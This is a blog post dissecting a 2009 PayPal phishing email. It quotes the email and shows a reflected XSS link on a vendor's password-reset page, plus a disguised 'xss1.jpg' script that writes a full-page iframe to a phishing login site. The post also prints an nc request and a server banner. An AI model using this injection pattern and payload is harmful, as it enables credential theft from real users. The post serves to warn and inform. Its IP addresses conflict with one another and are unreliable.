I received a lot of positive feedback around my blog post “Analysis of a Real World Hacking Attempt” and decided that after a recent email attempting to direct me to a paypal phishing site, it again was time to give a little insight as to what the latest attempts on phishing schemes are out there...
The email that read something like this:
Information about your account:Yes, they actually misspelled “click” on the phishing link, as well as other typos such as a double period, etc.
Attention! Your PayPal account was limited!
As part of our security measures, we regularly check the work of the screen PayPal. We have requested information from you for the following reason:
Our system has detected unusual charges to a credit card linked to your PayPal account.
Reference Number: PP-259-187-991
This is the last reminder to log into PayPal, as soon as possible. Once you connect. PayPal will provide measures to restore access to your account.
Once connected, follow the steps to activate your account. We appreciate your understanding as we work to ensure security.
Clik Here To Activate
We appreciate your attention to this issue. Please understand that this is a security measure designed to protect you and your account. We apologize for any inconvenience ..
Department review PayPal accounts
Copyright © 1999-2009 PayPal. All rights reserved.
PayPal FSA Register Number: 226056.
The link’s target location was:
This is a textbook XSS flaw, easily seen by
https://secure.instantssl.com/products/passwordResetRequest?orderNumber= " > [XSS HERE]
If you look at http://188.8.131.52/xss1.jpg it is actually an html file, not a jpg image file.
Its contents are:
<img src="http://184.108.40.206/xss1.jpg" alt="http://220.127.116.11/xss1.jpg"/>
Firefox even treats it as an image providing right click options over it such as “copy image” and “copy image location”, despite it being a script target in an image tag.
Tricky...and if you save it locally and open it, you can see that the xss1.jpg’s contents is:
document.write("<iframe src='http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run' width='100%' height='100%' frameborder=0 scrolling=0></iframe>");
Then http://transgalaxyproducts.com/bbnse/webscr/webscr.php?cmd=_login-run is actually the location of the Paypal phishing site...
That was the story as of March 3rd...
Today, March 24th, the code for the xss1.jpg image has changed as seen below:
C:\>nc 18.104.22.168 80
GET /xss1.jpg HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 25 Mar 2009 00:58:00 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_
auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/22.214.171.12435
Last-Modified: Sat, 07 Mar 2009 10:22:10 GMT
document.write("<iframe src='http://126.96.36.199/cls/ws-cgi/365236545.html' width
='100%' height='100%' frameborder=0 scrolling=0></iframe>");
The page at http://188.8.131.52/cls/ws-cgi/365236545.html seems to be that of a Craigslist listing for a truck in Atlanta, but saved locally to the server. Odd, and I have no guesses as to why this would be there... your guess is as good as mine, but that’s the reality of the stuff that is going on and out there. Hopefully this gave a little insight as to some of the subtle tricks hackers are using to try to steal your information. The IP 184.108.40.206 is in a block owned by Register.com out of New York and has a HTTP banner of "Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/220.127.116.1135".
Why there is a mirror of a Craiglist page is beyond me, but that’s where I’ll leave you to wonder on your own...